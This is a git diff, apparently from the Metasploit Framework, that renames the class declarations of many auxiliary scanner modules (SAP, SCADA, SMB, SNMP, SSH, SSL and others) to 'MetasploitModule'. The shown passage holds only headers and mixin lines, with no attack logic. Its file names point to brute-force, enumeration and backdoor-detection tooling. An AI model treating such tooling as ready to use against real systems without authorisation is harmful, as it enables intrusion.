MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 5cfe258ca9..7069c66c5b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index a9400633cf..f7233c60d9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -16,7 +16,7 @@ require "msf/core" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index ebac99fd8b..a97e65fda8 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index a93c3dfafe..10c13f6ba1 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 3de56d9a43..25d2ccffaa 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index 0838eae12e..1893540379 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index b0a9ea2d1c..eb6c6aad89 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb index 6b8acd99f2..ab3545a5bf 100644 --- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index ecf1f50a29..83e248ba52 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -8,7 +8,7 @@ require 'msf/core' # msfdev is going to want a bunch of other stuff for style/compat but this works # TODO: Make into a real AuthBrute module, although the password pattern is fixed -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index d570f4281b..b58a0fe30c 100644 --- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb +++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 70b5242414..34a7a5ee3f 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/scada/modbusdetect.rb b/modules/auxiliary/scanner/scada/modbusdetect.rb index 7740955785..3eff2c7567 100644 --- a/modules/auxiliary/scanner/scada/modbusdetect.rb +++ b/modules/auxiliary/scanner/scada/modbusdetect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb index c584b0e939..d9dfc144ff 100644 --- a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index dc9bcb0b3a..9622c45419 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 134cf2a2b1..f136b4e210 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 01dc953c4e..dbfb95bb4f 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index 581283c74e..21f0ae4ff4 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index 590b4c3a46..a98910c8ca 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 67304ca6ba..334adfa2bf 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index b7c68054c6..b884e8ce45 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 6717969a73..c150e7e810 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index d145bd5b26..f54004bbe9 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should go first include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb index 1100dd05c1..e33bc911d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb +++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index e4118ded74..2985ace425 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 3238c66dfc..172746cbb8 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index e8775e681f..6867ca1d20 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0fdf529ca7..1fe83ba462 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smb' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index eddfc7c841..e440845a29 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index 8a0c584137..9ffcc26c16 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index 9a1c016918..779de20c9f 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 7ff74bee87..ba2a9d2604 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb index eae920be73..e259235d43 100644 --- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb +++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index cac03b0b94..cc85ccee35 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index 54069a0dfb..6e6369efe3 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 99d8353ee0..e75cd693f7 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/arris_dg950.rb b/modules/auxiliary/scanner/snmp/arris_dg950.rb index a071e85520..91efc6d3b9 100644 --- a/modules/auxiliary/scanner/snmp/arris_dg950.rb +++ b/modules/auxiliary/scanner/snmp/arris_dg950.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index f78cc130b9..7921276cb0 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 6f4172e35d..f0c7d77486 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index bad6580176..0a7f640504 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 8fe98c4273..8af295c94c 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb index 904d5e8b0f..1e09a58b45 100644 --- a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb +++ b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 07530dafd5..ee6725b32a 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index dd54f5cd9e..596b5b508b 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 8886a67ae8..55ea5142b4 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 34a0940b48..e763078560 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index a12761684b..ecc44d8fac 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/community_string_collection' require 'metasploit/framework/login_scanner/snmp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index edd07e2785..bf88ec862c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 445634756e..573424c908 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index c6cf8702bd..c9530ef9e9 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index 52becd24cc..f514ac63bb 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/detect_kippo.rb b/modules/auxiliary/scanner/ssh/detect_kippo.rb index 1b1371675c..9d260001ec 100644 --- a/modules/auxiliary/scanner/ssh/detect_kippo.rb +++ b/modules/auxiliary/scanner/ssh/detect_kippo.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 71e0077f44..4fa73d6970 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb index be6c4539c9..723e085d0f 100644 --- a/modules/auxiliary/scanner/ssh/karaf_login.rb +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 3379adad44..0b817c1c14 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 6a066ffef3..dffbe52e5e 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/ssh' require 'sshkey' # TODO: Actually include this! -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index e6925f9660..c804ba9b4c 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 2fd040823b..be4b190e3f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 885d224e51..2f64059d2f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 7b727ef94c..9431875ba8 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 409c8722ad..854d0e8969 100644 --- 